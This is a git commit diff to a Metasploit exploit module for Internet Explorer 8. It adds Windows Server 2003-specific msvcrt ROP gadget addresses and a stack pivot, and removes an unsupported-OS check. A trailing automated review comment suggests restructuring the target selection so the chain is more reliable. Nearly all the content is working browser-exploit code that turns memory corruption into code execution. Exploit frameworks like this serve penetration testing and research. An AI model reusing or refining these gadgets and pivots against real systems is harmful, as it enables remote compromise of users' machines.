fixed rop chain for w2003

bug/bundler_fix
jvazquez-r7 2012-12-30 13:12:55 +01:00
parent cab84b5c27
commit cd58cc73d9
1 changed files with 13 additions and 9 deletions


@ -58,8 +58,8 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'Automatic', {} ], [ 'Automatic', {} ],
[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30 [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30
[ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30 [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30
[ 'IE 8 on Windows Server 2003', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30 [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30
[ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ] # 0x0c0c0b30 [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30
], ],
'Privileged' => false, 'Privileged' => false,
'DisclosureDate' => "Dec 27 2012", 'DisclosureDate' => "Dec 27 2012",
@ -90,9 +90,6 @@ class Metasploit3 < Msf::Exploit::Remote
os_name = 'Windows Vista' os_name = 'Windows Vista'
when '6.1' when '6.1'
os_name = 'Windows 7' os_name = 'Windows 7'
else
# OS not supported
return nil
end end
targets.each do |t| targets.each do |t|
@ -152,10 +149,17 @@ Stack Pivoting to eax:
case t['Rop'] case t['Rop']
when :msvcrt when :msvcrt
print_status("Using msvcrt ROP") print_status("Using msvcrt ROP")
stack_pivot = [0x77c15ed6].pack("V") * 54 # ret if t['Name'] =~ /Windows XP/
stack_pivot << [0x77c2362c].pack("V") # pop ebx, #ret stack_pivot = [0x77c15ed6].pack("V") * 54 # ret
stack_pivot << [0x77c15ed5].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c stack_pivot << [0x77c2362c].pack("V") # pop ebx, #ret
rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'}) stack_pivot << [0x77c15ed5].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c
rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
else
stack_pivot = [0x77bcba5f].pack("V") * 54 # ret
stack_pivot << [0x77bb4158].pack("V") # pop ebx, #ret
stack_pivot << [0x77bcba5e].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c
rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'2003'})
end
else else
print_status("Using JRE ROP") print_status("Using JRE ROP")
stack_pivot = [0x7c348b06].pack("V") * 54 # ret stack_pivot = [0x7c348b06].pack("V") * 54 # ret
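Review bot: In the `when :msvcrt` branch the Server 2003 gadget set is chosen by the bare `else` after `if t['Name'] =~ /Windows XP/`, so any other target carrying `'Rop' => :msvcrt` (the target table in the first hunk currently lists only XP and 2003) would silently receive the 2003 addresses and a pivot built for the wrong msvcrt build. An explicit second arm, `elsif t['Name'] =~ /Windows Server 2003/`, with the remaining fall-through treated as an unsupported target, would make such a mismatch visible instead of handing generate_rop_payload a pivot that cannot work. The two arms differ only in three addresses and the `'target'` string, so a small per-target lookup would also remove the duplicated pivot construction. The enclosing `case t['Rop']` continues past the end of the hunk.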